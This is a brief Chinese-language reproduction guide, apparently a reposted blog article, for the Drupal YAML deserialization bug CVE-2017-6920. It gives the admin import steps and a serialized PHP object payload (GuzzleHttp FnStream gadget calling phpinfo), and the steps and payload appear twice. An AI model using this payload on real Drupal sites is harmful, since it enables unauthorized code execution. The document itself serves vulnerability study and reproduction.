# CVE-2017-6920 Drupal YAML 反序列化代碼執行漏洞
http://127.0.0.1/admin/config/development/configuration/single/import
Configuration type選擇為Simple configuration
Configuration name可以隨便填寫,在Paste your configuration here中寫入poc:
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
登錄管理員賬戶,訪問以下URL:
http://127.0.0.1/admin/config/development/configuration/single/import
Configuration type選擇為Simple configuration
Configuration name可以隨便填寫,在Paste your configuration here中寫入poc:
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
點擊左下角的Import按鈕便可以觸發漏洞。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容